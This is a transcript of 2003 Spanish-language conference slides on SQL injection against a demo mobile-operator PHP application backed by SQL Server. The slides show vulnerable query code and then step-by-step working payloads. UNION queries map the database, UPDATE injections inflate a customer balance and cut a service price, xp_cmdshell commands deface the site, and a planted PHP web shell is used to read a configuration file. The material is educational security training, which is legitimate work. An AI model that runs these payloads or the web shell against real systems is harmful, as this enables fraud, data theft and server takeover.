Exploiting Web applications SQL Injection
-
Upload
conferencias-fist -
Category
Technology
-
view
455 -
download
4
Transcript of Exploiting Web applications SQL Injection
![Page 1: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/1.jpg)
© Rafael San Miguel Carrasco
SQL Injection
FIST Conference October 2003 @
![Page 2: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/2.jpg)
2© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Escenario:
Windows 2000 Professional
Apache Win32 1.3.28
PHP 4.3.3
SQL Server 2000
Documentos HTML y scripts PHP
![Page 3: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/3.jpg)
3© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Operadora de móviles, servicios online:
consulta de saldo
contratación de teleservicios
A través de un identificador secreto asignado a cada cliente, que se utiliza para consultar información y como medio de pago.
![Page 9: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/9.jpg)
9© Rafael San Miguel Carrasco, [email protected]
SQL Injection
consultasaldo.php:
$query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';"; $result = mssql_query ($query); $nfilas = mssql_num_rows ($result); while ($row = mssql_fetch_array ($result) ) {
echo "Nombre del cliente: <b>" . $row[0] . " " . $row[1] . "</b><br>"; echo "Saldo actual: <b>" . $row[2] . "</b>";
}
![Page 10: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/10.jpg)
10© Rafael San Miguel Carrasco, [email protected]
SQL Injection
contratar.php:
$query = "SELECT * FROM servicios WHERE id='$idservicio';"; $result = mssql_query ($query); $row = mssql_fetch_array ($result);$precio = $row [3]; echo "El precio del servicio que desea contratar es de <b>$precio</b> euros<br>"; $saldo_final = $saldo_actual - $precio; $query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';"; mssql_query ($query); $query = "UPDATE clientes SET servicio" . $idservicio. "=1 WHERE id='$idcliente';"; mssql_query ($query);
![Page 11: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/11.jpg)
11© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Mapear la base de datos:
tablas que componen la base de datos
listado y tipo de las columnas de cada tabla
![Page 12: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/12.jpg)
12© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5' AND 1=0 union select TABLE_NAME from
INFORMATION_SCHEMA.TABLES—
Warning: mssql_query(): message: Todas las consultas de una instruccion SQL que contenga un operador UNION deben tener el mismo numero de expresiones en sus listas de destino. (severity 16) in c:\apache\htdocs\consultasaldo.php on line 21
5‘ AND 1=0 union select TABLE_NAME," ",1 from
INFORMATION_SCHEMA.TABLES--
![Page 14: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/14.jpg)
14© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS
![Page 15: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/15.jpg)
15© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS—
![Page 16: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/16.jpg)
16© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0; update clientes set saldo=500000 where id=5555--
![Page 17: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/17.jpg)
17© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5556'; update servicios set precio=1 where nombre_servicio="llamada en espera"—
![Page 18: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/18.jpg)
18© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Warning: mssql_query(): message: Linea 1: sintaxis incorrecta cerca de '—'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
Warning: mssql_query(): message: Comilla no cerrada antes de la cadena de caracteres ';'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
![Page 19: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/19.jpg)
19© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> <br>hackedwebpage!</body></html>" > c:\apache\htdocs\deface.htm'—
5556’; exec master..xp_cmdshell ‘copy c:\apache\htdocs\deface.htm
c:\apache\htdocs\principal.htm’—
![Page 21: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/21.jpg)
21© Rafael San Miguel Carrasco, [email protected]
SQL Injection
<html><body><?php$comando = $_GET["comando"];echo "$comando<br>";$resultado = system ($comando);echo $resultado;?></body></html>
shell.php:
O también: passthru ()
![Page 22: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/22.jpg)
22© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5556'; exec master..xp_cmdshell 'echo "<html><body><?php $comando=$_GET["comando"];echo $comando;$resultado = system ($comando);echo $resultado;?></body></html>" > c:\apache\htdocs\shell.php'--
http://127.0.0.1/shell.php?comando=dir..
![Page 23: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/23.jpg)
23© Rafael San Miguel Carrasco, [email protected]
SQL Injection
http://127.0.0.1/shell.php?comando=type c:\odbc.conf
![Page 24: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/24.jpg)
24© Rafael San Miguel Carrasco, [email protected]
SQL Injection
En php.ini:
; Magic quotes for incoming ; GET/POST/Cookie data.magic_quotes_gpc = On / Off
Sin embargo, con campos numéricos esta protección es inútil
![Page 25: Exploiting Web applications SQL Injection](https://reader033.fdocuments.us/reader033/viewer/2022042518/55a3b1ac1a28abf9678b4632/html5/thumbnails/25.jpg)
© Rafael San Miguel Carrasco
Madrid, 25 October 2003
FIST Conference October 2003
SQL Injection